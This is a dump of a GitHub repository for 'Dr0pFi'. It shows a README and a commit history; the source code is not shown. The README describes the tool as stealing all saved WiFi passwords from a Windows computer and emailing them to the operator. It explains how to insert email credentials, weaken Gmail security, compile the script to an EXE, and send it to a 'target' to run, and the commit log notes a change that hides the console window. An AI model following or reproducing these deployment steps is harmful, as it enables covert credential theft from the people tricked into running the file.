======================: FILES :======================
Dr0pFi
├── build.py
├── Dr0pFi.py
├── README.md
└── requirements.txt

0 directories, 4 files
======================: README CONTENT :======================
# Dr0pFi - Steal WiFi Passwords from Windows
Using this tool, You can capture all Saved WiFi Passwords stored on Windows Computer and mail them to your email!

# Note

`--> You need Python2 for compiling the Dr0pFi to a executable.`

`--> I thank Zaid Sabih as he taught me to make this kind of wonderful and useful programs.`

`--> I am not going to be responsible for any Illegal Purpose`      

# General Info

Using Dr0pFi, You can capture all WiFi Passwords from a Windows Computer and mail them to your Email, This is the beta version of my program, And soon a new Version will come out soon.

# Installation

--> To install Dr0pFi, You can use the git clone command else, Download it as zip.

`git clone https://github.com/Vedant-Bhalgama/Dr0pFi.git`
 
--> After you have downloaded it, Open CMD and type this command. This is going to install all the required packages for the program.

`pip -r install requirements.txt`


![requiremetns](https://user-images.githubusercontent.com/67494275/89538839-ae1a5f00-d818-11ea-8fe5-ece4564a9530.PNG)


# Usage 

--> To use the tool, First of all you need to edit the Email ID and Password. You need to replace **youremid** and **yourempass** with your real Email Credentials

For EG. My Email ID which I have taken over here is **fakemail@ gmail.com** and My Password which I have taken over here is **fakepass**


![fakeid](https://user-images.githubusercontent.com/67494275/89539697-b7f09200-d819-11ea-90c7-16de5a019abe.PNG)


--> Please make sure that **Less Secure Apps is turned on in your Gmail Account**, See the screenshot below! Go to this Link to Turn it on

`https://myaccount.google.com/lesssecureapps`


![Less_Secure_Apps](https://user-images.githubusercontent.com/67494275/89539923-fe45f100-d819-11ea-8d72-09b35bd8fcee.PNG)


# Build to EXE


--> So, Simply open CMD on your Computer and then run the build.py using Python2. Build.py is going to compile our Dr0pFi.py to EXE. Refer to the screenshot below!


![Build](https://user-images.githubusercontent.com/67494275/89541419-f6874c00-d81b-11ea-80a2-3d15bed0530a.PNG)


--> After you compile it to EXE, You are going to see the EXE file in the **dist** folder.


![Drop](https://user-images.githubusercontent.com/67494275/89541480-0d2da300-d81c-11ea-9e5c-86c2a3ed237c.PNG)


# Final Output

--> After you send the File to the Target, After he/she executes it, You are going to receive a mail in which all Wifi Passwords are going to be there! **(You will receive Passwords only on that mail which you had edited in the script, Also make sure Less Secure Apps is turn on for your Google Account)**

--> Wifi Passwords Final Output

![Final Output](https://user-images.githubusercontent.com/67494275/89542144-e7ed6480-d81c-11ea-8cf2-d45f9e497dc8.PNG)
====================== GIT HISTORY: ======================
6f96e6a HEAD@{0}: clone: from https://github.com/Vedant-Bhalgama/Dr0pFi
commit 6f96e6ac91f9001fdd60970e2e4eaffd506c5e5f
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Jul 22 14:01:26 2021 +0530

    Update Dr0pFi.py

commit 33f1f633c12926a7a227093df396d7df49503b58
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Wed May 5 20:41:56 2021 +0530

    Update Dr0pFi.py

commit 95d091c414db24e52275f0833fdc64285f648342
Merge: 1f25e91 5cdac68
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Wed May 5 20:41:22 2021 +0530

    Merge pull request #6 from krishpranav/patch-1
    
    added functions

commit 5cdac68c52f136d6fa382af0c4dfc289bf3f6547
Author: Krisna Pranav <68631244+krishpranav@users.noreply.github.com>
Date:   Wed May 5 18:52:22 2021 +0530

    added functions
    
    added input functions and called them in send_email()

commit 1f25e9158b488be5948493eb7f93f7b24c85a0ce
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Sat Aug 22 08:52:10 2020 +0530

    Update README.md

commit 93f425036bc6823062d0960d8e3f11d0d3bc887b
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 21 10:42:38 2020 +0530

    Update README.md

commit 18af07a7609a784fabce954858e55efab9d0f84d
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 21 10:42:12 2020 +0530

    Update README.md

commit 9d4a1193bec4b036692f309f86216fed5f5331f6
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 21 10:41:15 2020 +0530

    Added requests

commit 48bbe5f9045bd31985bb391490c29cd0c4bf79a9
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 17:40:09 2020 +0530

    Update Dr0pFi.py

commit 5d7ad2ba9e6979a0e7882fcfcf7c768395fe8f28
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:18:57 2020 +0530

    Update README.md

commit 7b7e8da253d11f76681795ae78bef7ba2410adb7
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:18:42 2020 +0530

    Update Dr0pFi.py

commit 7f9bd1f651d1dd7f23cc64b36ea603f091b03136
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:18:16 2020 +0530

    Update requirements.txt

commit e289d833e5400cf4e5a21b458e9d63498ab71576
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:09:36 2020 +0530

    Add files via upload

commit b774b81549981f282d3d379874c2fe76cb4f9c68
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:08:25 2020 +0530

    Delete requirements.txt

commit 769177c01509b804f3d59b5c9dbb2b8a8bec1dc9
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:06:28 2020 +0530

    Update README.md

commit bd7925b56f12708291873fd63fbd4289fa24352a
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 09:06:07 2020 +0530

    Update README.md

commit 3ee3bca06c838b2130503aa3fbc89b86608e6bf6
Merge: d053a24 fcc2228
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 20 07:54:50 2020 +0530

    Merge pull request #1 from 1d8/master
    
    Added hiding console window for you!

commit fcc22287c2e79d4887cbe80060bc5acc7288aba4
Author: 1d8 <56985822+1d8@users.noreply.github.com>
Date:   Wed Aug 19 11:56:50 2020 -0700

    Update Dr0pFi.py

commit 94e6b70e3963f07c4a7afff519a58478bbd36a6a
Author: 1d8 <56985822+1d8@users.noreply.github.com>
Date:   Wed Aug 19 11:52:02 2020 -0700

    Update README.md

commit 98754070a0e81ca6098680d7e5a494bed9deb9b5
Author: 1d8 <56985822+1d8@users.noreply.github.com>
Date:   Wed Aug 19 11:50:53 2020 -0700

    Update Dr0pFi.py

commit d053a24e04d5516119392e176d3619e61bc3127e
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Sat Aug 8 13:36:37 2020 +0530

    Update Dr0pFi.py

commit 0ce8202a3d2a5908c7e6319f4d1ff2d0fc9f66e3
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Sat Aug 8 13:36:08 2020 +0530

    Update Dr0pFi.py

commit 7e8ffe3baab7e35570eaf3753a1234eee8c452fe
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:54:55 2020 +0530

    Update README.md

commit f096180c16cf3f2ef2cb5bc2c007f84dd4440fb1
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:54:10 2020 +0530

    Update README.md

commit ff459ea93a40b2bb3febae550516f9bd218f4290
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:53:59 2020 +0530

    Update README.md

commit e47b688c54070f351fc37a99882d7f088be4789d
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:53:41 2020 +0530

    Update README.md

commit de0f387a35cefbe9f249874be0d0cbb6cee53e48
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:53:27 2020 +0530

    Update README.md

commit 249116f960552c9f40f98bc3727b715733fd6166
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Fri Aug 7 21:52:17 2020 +0530

    Update README.md

commit 156e1ef409ee6aaa8a36a0a81aa46000a3496e25
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 20:28:05 2020 +0530

    Added New requirements.txt

commit a404857f418c751ca1b8a5757d1d081f5f99ddb9
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 20:27:47 2020 +0530

    Added requirements.txt

commit 21ed36e2144d3dfda869b5c5b739e913095e8848
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 20:27:25 2020 +0530

    Add files via upload

commit 91dc949f9494ba3ea1782068507dadec3ea0d8d5
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 20:27:06 2020 +0530

    Added Dr0pFi

commit 6cb8e088b71162a7eeec1adcacf947f3056184ef
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:42:11 2020 +0530

    Update README.md

commit da633eadbc04929415cb77c113a3a37eda6d73c3
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:41:07 2020 +0530

    Update README.md

commit ee7d731b0aa197658e29c32f96665a2c6d2a3b8b
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:38:48 2020 +0530

    Update README.md

commit 29a34bbb6d8a3f81002c30fc0cb2ad3b913d8729
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:21:28 2020 +0530

    Update README.md

commit 241e682293c20c4c87e89beecb86c8e5f747d75c
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:20:01 2020 +0530

    Update README.md

commit 3859d9e683ce861b18fac937b1be0902d2fe356b
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:14:43 2020 +0530

    Update README.md

commit 35acfab54e9e011f6f74883ff854d0a94191e9ac
Author: Vedant Bhalgama <67494275+Vedant-Bhalgama@users.noreply.github.com>
Date:   Thu Aug 6 19:07:54 2020 +0530

    Create README.md
